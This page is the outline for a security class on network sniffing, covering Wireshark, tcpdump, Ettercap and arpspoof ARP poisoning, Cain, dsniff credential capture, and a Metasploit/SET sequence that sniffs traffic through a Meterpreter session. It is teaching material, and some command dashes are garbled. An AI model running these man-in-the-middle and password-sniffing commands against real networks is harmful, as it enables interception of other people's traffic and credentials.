Network Sniffers Class for the Kentuckiana ISSA 2011 (Hacking Illustrated Series InfoSec Tutorial Videos)

We decided to put on another sniffers class. This time Gary Hampton joins me to impart his knowledge of using Wireshark to diagnose problems on wireless networks. I cover the usual suspects: TCPDump, Metasploit sniffing with Meterpreter, ARP Poisoning, Ettercap, Cain, NetworkMinor, Firesheep and Xplico. I lost part of Gary's on screen demo when my recording rig froze up, and I apparently did not make a proper sacrifice to the demo gods for my section when I tried to show off Ettercap filters, but I hope you still find it informative.

Part 3: A little more Wireshark, TCPDump, Metasploit sniffing with Meterpreter, ARP Poisoning, Ettercap, Cain, NetworkMinor, Firesheep, Xplico and bridging.

Wireshark Demo

1. Run Wireshark

2. Basic start capture

3. Start capture with options

4. Drill down OSI

5. Capture filter options (4.9 in book)
not tcp port 3389
not broadcast and not multicast

6. Show a packet

7. Pop a packet out

8. Sort by columns

9. Follow stream (web traffic)

10. Export HTTP Objects

11. Simple view filters
tcp.port == 80
!(ip.addr == 192.168.1.13)

12. Filter builder

13. Apply filters from different panes (packet vs. details panes).

14. Save filters

15. Open a Wiki page

16. Edit-> Find packet

17. Analyzers ->Expert Info

18. Analyzers ->Firewall ACLs

19. Stats

20. Color rules

21. Save capture

22. Mention Lua

Dumpcap/TCPDump

dumpcap �D
dumpcap -i eth0 -s 0 -f "port 80" -w webtraffic.pcap

Sniffing in Monitor mode

   ifconfig wlan0 down
   iwconfig wlan0 mode monitor
   iwconfig wlan0 channel 1
   ifconfig wlan0 up

Ettercap Demo

1. ettercap -T �q �i eth0 -M ARP // //

2. ettercap -T �q �i eth0 -M ARP // /10.1.1.1/

3. Show ARP traffic

4. Telnet to 10.1.1.1

5. http to 10.1.1.1

6. FTP/Telnet/HTTP someplace with a password

7. Show find sniffers
ettercap �G
ettercap �T �I eth0 �P list
ettercap �T �I eth0 �P search_promisc //

8.      Filters:
     etterfilter ig.filter -o ig.ef
     ettercap -T -q -F ig.ef -M ARP // //

9. Mention MITM: icmp, dhcp, port filters

10. driftnet -i eth0

11. Etherape

Cain Demo

1. Start poisoning

2. Telnet to 10.1.1.1

3. http to 10.1.1.1

4. FTP/Telnet/HTTP someplace with a password

5. SSL someplace from VM

6. Sniff RDP

ARPSpoof Demo

   cat /proc/sys/net/ipv4/ip_forward
   echo 1 > /proc/sys/net/ipv4/ip_forward
   arpspoof -i eth0 10.0.0.1
   arpspoof -i eth0 -t 10.0.0.113 10.0.0.1
   dsniff �I eth0 -c

NetworkMiner

1. TCP fingerprinting

2. Host details

3. DHCP finger printing

4. File capture

5. Passwords

6. Plaintext

7. Open pcap

Bridging in Linux setup

sudo apt-get install bridge-utils

Script to setup MAC bridging:

    ifconfig eth0 0.0.0.0
    ifconfig eth1 0.0.0.0
    brctl addbr mybridge
    brctl addif mybridge eth0
    brctl addif mybridge eth1
    ifconfig mybridge up

Things to show while bridged

    ifconfig
    sudo tcpdump -i mybridge -s 0 -w out.cap
    sudo etherape -i mybridge
    sudo driftnet -i mybridge

Metasploit/SET

   Backtrack->Penetration->SET
   Menu Choices 2, 1, 2 (Google.com), 2, 2, default, no
   <go to page>
   sessions -i 1
   use sniffer
   help
   sniffer_interfaces
   sniffer_start 2
   sniffer_dump 2 /tmp/all.cap
   <Show in Wireshark>

More at http://www.offensive-security.com/metasploit-unleashed/Packet_Sniffing_With_Meterpreter